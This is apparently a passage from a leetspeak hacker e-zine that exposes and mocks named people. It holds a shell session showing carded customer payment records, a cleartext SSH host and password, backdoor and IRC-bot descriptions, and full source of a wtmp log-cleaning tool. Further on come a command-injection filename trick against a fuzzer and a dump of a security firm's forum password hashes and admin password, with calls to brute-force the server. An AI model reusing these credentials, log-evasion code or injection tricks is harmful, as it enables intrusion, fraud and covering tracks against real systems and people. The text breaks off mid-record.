sshd:x:33:33:sshd:/:
konewka:x:1000:100:***********,,,:/home/konewka:/bin/bash
free:x:1005:100:FTP,,,:/home/free:/bin/false
konewka@olek:~$ cd b0x
konewka@olek:~/b0x$ ls
mcux.txt gwee-1.36 m0d.txt matrix.txt mod.pl ns/ tar.tar.gz
konewka@olek:~/b0x$ cat cux.txt
First Name Jim
Last Name [edited]
Address [edited]
City [edited]
State NC
Post Code [edited]
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card James [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=10.1499999761581
First Name Dana
Last Name [edited]
Address [edited]
City [edited]
State OR
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Next Day Air
Weight=8
Ship to Name [edited]
Ship to Address [edited]
Ship City [edited]
Ship State IN
Ship Post Code [edited]
Ship Country US
Customer Information
First Name Marlene
Last Name [edited]
Address [edited]
City [edited]
State TN
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Marlene [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=25
Ship to Name Marlene [edited]
Ship to Address [edited]
Ship City [edited]
Ship State TN
Ship Post Code [edited]
Ship Country US
Customer Information
First Name Michael
Last Name [edited]
Address [edited]
City [edited]
State TX
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Michael [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=15.2000000476837
Customer Information
First Name Paula
Last Name [edited]
Address [edited]
City [edited]
State ME
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Paula [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=8
konewka@olek:~/b0x$ cat m0d.txt
217.115.176.3
port - 22
proto - ssh
user - bes
pass - gbpltw
**************
konewka@olek:~/b0x$ head -n2 matrix.txt
http://vvmu.isot.ru/index.php?pa ... od.ru/universal.php
http://ezonet.ru/index.php?page= ... .narod.ru/universal
konewka@olek:~/b0x$ cd ../w0rkz
konewka@olek:~/w0rkz$ ls
eric-client.c evil.php kenny-smart.c mybindshell.c sesje.bash*
eric.c kenny* log_clean.c priv8kenny.c tvn.c
konewka@olek:~/w0rkz$ head -n6 eric.c
/*
** eric.c - Fri May 12 2004
** Linux backdoor with terminal support.
** Compile with -lutil flag.
** konewka/roSEC
*/
konewka@olek:~/w0rkz$ head -n5 eric-client.c
/*
** eric-client.c - Fri May 12 2004
** Simple client which connects to your eric backdoor
** konewka/roSEC
*/
konewka@olek:~/w0rkz$ head -n15 kenny-smart.c
/*
** kenny.c by konewka <
konewka@eviltime.com>
**
** Simple IRC bot, that can execute shell commands and print it out
** to you. With this bot you may execute shell commands with full anonymity,
** it's kind of connect back backdoor.
**
** It has been tested on IRCnet and EFnet IRC networks, and should
** compile without any problems on Linux and FreeBSD.
**
** If you want only one certain host to execute commands compile with
** -DMASTERONLY flag and change MASTER define.
**
** Fell free to add your functions, but keep my nickname in credits.
*/
konewka@olek:~/w0rkz$ cat log_clean.c
#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int main(int argc, char *argv[]) {
struct utmp ut;
char user[] = "konewka", host[] = "konewka";
int f_in, f_out, ut_len;
if ((f_in = open("/var/log/wtmp", O_RDONLY)) < 0) {
printf("cant open\n");
return -1;
}
if ((f_out = open("wtmp", O_WRONLY|O_CREAT)) < 0) {
printf("cant open to write\n");
return -1;
}
ut_len = sizeof(ut);
while (read(f_in, &ut, ut_len) == ut_len) {
if (!strncmp(ut.ut_user, user, strlen(user)) || !strncmp(ut.ut_host, host, strlen(host)))
;
else
write(f_out, &ut, ut_len);
}
close(f_out);
close(f_in);
return 0;
}
konewka@olek:~/w0rkz$ head -n5 mybindshell.c
/* mybindshell.c coded by konewka (
www.olek.org)
* backdoor (bindshell) with password.
* cleaned up code.
* enjoy !
*/
konewka@olek:~/w0rkz$ head -n39 priv8kenny.c
/*
** priv8kenny.c by konewka <
konewka@eviltime.com>
**
** Simple IRC bot, that can execute shell commands and print it out
** to you. With this bot you may execute shell commands with full anonymity,
** it's kind of connect back backdoor.
**
** It has been tested on IRCnet and EFnet IRC networks, and should
** compile without any problems on Linux and FreeBSD.
**
** Fell free to add your functions, but keep my nickname in credits.
**
** Few words about the usage, the best way is to take a look into source.
** Anyway, when bot successfuly joined our channel, you can:
** - Exec commands by !sh <command>
** - Join/part channels by !part/!join <#channel_name>
** - Op/Deop users by !op/deop <user1> [user2] [user3]
** - Select random nick and then voice or kick him by !random voice/kick
** - To quit use !exit
**
** Changes:
** - Added next "war" option - mass deop (!mdeop)
** - Added mass kick - !mkick or !mkick noops to kick only users without op
** - Added simple userlist and kick protection on users (change users array)
** - Added timer in port_scan() and service display
** - Added ping reply while connecting on some irc servers (irc.0x333.org)
** - Added ctcp version reply
** - Added reconnect()
** - Added mass deop protection, on d4rkgr3y request :)
** - Added !scan - use !scan <nickname> or <hostname>
** - Added !script and !run that allow you to program your bot, e.g.
** !script mode #ch +i;privmsg #ch :haha :) and !run to execute instructions
** - Added !say - syntax should look like this !say <nick/#chan> :message text
** - Added !where to locate bot
** - Fixed bot.nick overwrite
** - Added !op and terrific random kick/voice - !random kick/voice.
** - Fixed process hide (port).
** - Fixed Since now errors from execution wont be printed to terminal.
*/
konewka@olek:~/w0rkz$ head -n8 tvn.c
/* copyright (c) konewka
* moje malenstwo do sprawdzania rozkladu jazdy na stacji TVN (uwielbiam wasza telewizje)
* polecam uzywac razem z jakims edytorem strumieniowym, sed, awk (..)
* PRZEGLADAC Z MORE'em ! :)
*
* Pozdrawiam Tomasza Lisa.
*
*/
konewka@olek:~/w0rkz$
wh4t a h4q3r! th1z k1d w4st3z m0r3 t1m3 c0d1ng p01ntl3zz to0lz th4n synapze 0n
th3 w33k3ndz h3 h4z c0k3.
02.txt -~-~-~ ri0t c0d3z
ri0t m1lw0rmz m0r3 3xpl01tz th4n a h4q3d ES ftpd. h3z n0t g01ng t0 qu1t s3cur1ty
c4uz3 h3'z g41n1ng m0r3 f4m3 th4n ph0bos & cold-fire fr0m t3chtv r3runz! 3xp0s3d
1n r3sp3ct4bl3 full d1zcl0sur3 f4zz10n.
y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0
t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk.
j4q:/Users/anybody/fuzz j4q$ echo '' > '`ls>abc`'
j4q:/Users/anybody/fuzz j4q$ chmod 7777 '`ls>abc`'
j4q:/Users/anybody/fuzz j4q$ su anybody
Password:
anybody:~/fuzz anybody$ wget
http://www.ri0tnet.net/fuzzyri0t.tar.gz
anybody:~/fuzz anybody$ tar -zxvf fuzzyri0t.tar.gz
fuzzyri0t.pl
anybody:~/fuzz anybody$ ls -al
total 24
drwxrwxrwx 4 anybody 14790 136 Jul 24 04:09 .
drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 ..
-rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc`
-rw-r--r-- 1 anybody 14790 6618 Jul 24 04:08 fuzzyri0t.pl
anybody:~/fuzz anybody$ perl fuzzyri0t.pl
What task would you like to perform?
[0] Input target program manualy.
[1] Select target program from a list of all suid programs.
[2] Display all world writeable files on the system.
[3] Display all world writeable directories on the system.
[4] Exit.
Please input choice: 1
Finding all suid programs on the system this will only occur once please wait.....
[0] /bin/df
[1] /bin/ps
[2] /bin/rcp
[3] /dev/fd/3/`ls>abc`
[4] /sbin/launchd
[5] /sbin/mount_nfs
[6] /sbin/mount_smbfs
[7] /sbin/ping
[8] /sbin/ping6
[9] /sbin/restore
[10] /sbin/route
[11] /sbin/rrestore
[12] /sbin/umount
[13] /Users/anybody/fuzz/`ls>abc`
[14] /usr/bin/at
[15] /usr/bin/atos
[16] /usr/bin/atq
[17] /usr/bin/atrm
[18] /usr/bin/batch
[19] /usr/bin/chfn
[20] /usr/bin/chpass
[21] /usr/bin/chsh
[22] /usr/bin/crontab
[23] /usr/bin/edit
[24] /usr/bin/fetchmail
[25] /usr/bin/heap
[26] /usr/bin/leaks
[27] /usr/bin/lockfile
[28] /usr/bin/login
[29] /usr/bin/lppasswd
[30] /usr/bin/malloc_history
[31] /usr/bin/nfsstat
[32] /usr/bin/passwd
[33] /usr/bin/procmail
[34] /usr/bin/quota
[35] /usr/bin/rlogin
[36] /usr/bin/rsh
[37] /usr/bin/sample
[38] /usr/bin/setregion
[39] /usr/bin/smbutil
[40] /usr/bin/su
[41] /usr/bin/sudo
[42] /usr/bin/top
[43] /usr/bin/vmmap
[44] /usr/bin/wall
[45] /usr/bin/write
[46] /usr/sbin/lsof
[47] /usr/sbin/netstat
[48] /usr/sbin/postdrop
[49] /usr/sbin/postqueue
[50] /usr/sbin/pppd
[51] /usr/sbin/screenreaderd
[52] /usr/sbin/scselect
[53] /usr/sbin/traceroute
[54] /usr/sbin/traceroute6
[55] /usr/sbin/trpt
[56] /usr/sbin/vpnd
Please select desired target: 13
running program with no options to get usage settings.
sh: line 1: /Users/anybody/fuzz/: is a directory
Please input any optional switches you would like to use with the target program:
Please select attack payload
[0] Standard Buffer Overflow
[1] Standard Format String
[2] Custom Attack Payload
[3] Main Menu
Please input choice: 3
What task would you like to perform?
[0] Input target program manualy.
[1] Select target program from a list of all suid programs.
[2] Display all world writeable files on the system.
[3] Display all world writeable directories on the system.
[4] Exit.
Please input choice: 4
anybody:~/fuzz anybody$ ls -al
total 32
drwxrwxrwx 5 anybody 14790 170 Jul 24 04:11 .
drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 ..
-rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc`
-rw-r--r-- 1 anybody 14790 26 Jul 24 04:11 abc
-rw-r--r-- 1 anybody 14790 6619 Jul 24 04:11 fuzzyri0t.pl
anybody:~/fuzz anybody$
th4nkz t0 0ur 0d4y 0SX p0rt 0f f1l3fuzz w3 w3r3 4bl3 t0 sp0t th1z s3cur1ty h0l3
(bd) b3f0r3 ri0t c0uld uz3 1t 4g41nst uz!@ f33l fr33 t0 us3 1t & m4k3 ri0t rm
h1ms3lf. w3 w1ll tr4d3 4n 3xpl01t 4g41nztfuzzyri0t f0r a r3m0t3 psybnc 0r r3m0t3
cvs 0d4y. 3m41l
dvdman@l33tsecurity.com t0 w0rk 0ut d3t41lz (s3nd pic@#$!).
03.txt -~-~-~ sabre-security
az yu0 all kn0w, sabre-secur1ty releazes some el1te auditing t00lz. h4LvaR fl4ke
iz a g3niuz but h3 k4nt s33m to sekure h1z shit w3ll... s0 w3 had t0 0wn hiz
f0rumz!! i mean sh1t, wr1ting all th3ze sec t00lz iz r34lly h4rd 0r s0meth1ng &
secur1ng a f0rum muzt be ev3n hard3r!
http://www.sabre-security.com/fo ... forum_01/forum.info
<forum_name>SABRE BinDiff</forum_name>
<forum_more>Discussions of SABRE BinDiff, binary diffing and IDB migration in general</forum_more>
<forum_pass>SiawRaNQeVgkI</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/fo ... forum_02/forum.info
<forum_name>SABRE BinNavi</forum_name>
<forum_more>Discussions of SABRE BinNavi, graph-based debugging and input crafting</forum_more>
<forum_pass>SifafLvA6kS8o</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/fo ... forum_03/forum.info
<forum_name>SABRE BinAudit</forum_name>
<forum_more>Discussions of SABRE BinAudit, automated static analysis of executables, dataflow analysis</forum_more>
<forum_pass>SiJQ4YtHtAqFE</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/fo ... forum_04/forum.info
<forum_name>General RE</forum_name>
<forum_more>General discussion of matter related to binary analysis</forum_more>
<forum_pass>Si/QbwJMRBLNs</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/fo ... es/simpleforum.conf
wh0a d00dz, s1nce wh3n are sekur1ty pr0fessi0nalz
supp0z3d t0 leav3 their syst3mz open th1z wide?@
admin_password:SiD7JOBQAe6Y2
images_dir:simpleforum_files/images
h3y skew, if yu0'r3 read1ng th1z sh1t, n0w iz th3
tim3 t0 sshbrute th3 fuq outta the s3rv3r.
0h and mak3 sur3 y0u craq th3ze. w3 are n0t
capabl3 0f such elite taskz. h4r h4r h4r!@!($@#
title:SABRE Security User Forum
home_name:Home
home_url:
http://www.sabre-security.com/content.html
hour_difference:0
hoursystem:12
date_notation:ddmmyy
html_protection:on
bbcode:on
smileys:on
author_edit:on
backgroundcolor:#FFFFFF
backgroundimage:simpleforum_files/images/background.gif
tablecolor1:#E9E6E6
tablecolor2:#D8D7D7
tablecolor3:#F8F7F7
tablebordercolor:#555555
tablewidth:93%
postformbackground:#E9E6E6
fontface:verdana,arial
fontsize:9
fontsizesmall:8
fontcolor:#555555
topics_per_page:10
posts_per_page:20
popularnumb:15
link_color:#E27153
visited_link_color:#E27153
link_hover_color:#CC6666
language:English
mail:off
admin_email:
mailprog:/usr/sbin/sendmail
admin_email_notify:off
show_email_addresses:off
attachments_dir:simpleforum_files/attachments
attachments_url:simpleforum_files/attachments
allow_attachments:yes
attachments_uploadmax:1024000
m4ybe y0u fuck3rz sh0uld BinNavi y0ur 0wn CGI, h4 h4r h4r!!
w3've alw33z want3d t0 be devel0perz f0r sabre BinNavi,
and eye th1nk luQ sh1ned d0wn up0n uz:
<post>
<name>halvar.flake</name>
<ip>***.**.***.**</ip>
<email>
halvar.flake@sabre-security.com</email>
<subject>Welcome ...</subject>
<time>1101219538</time>
<message>... if you can read this, you're a developer for SABRE BinNavi :-)
</message>
</post>
<post>
<name>S
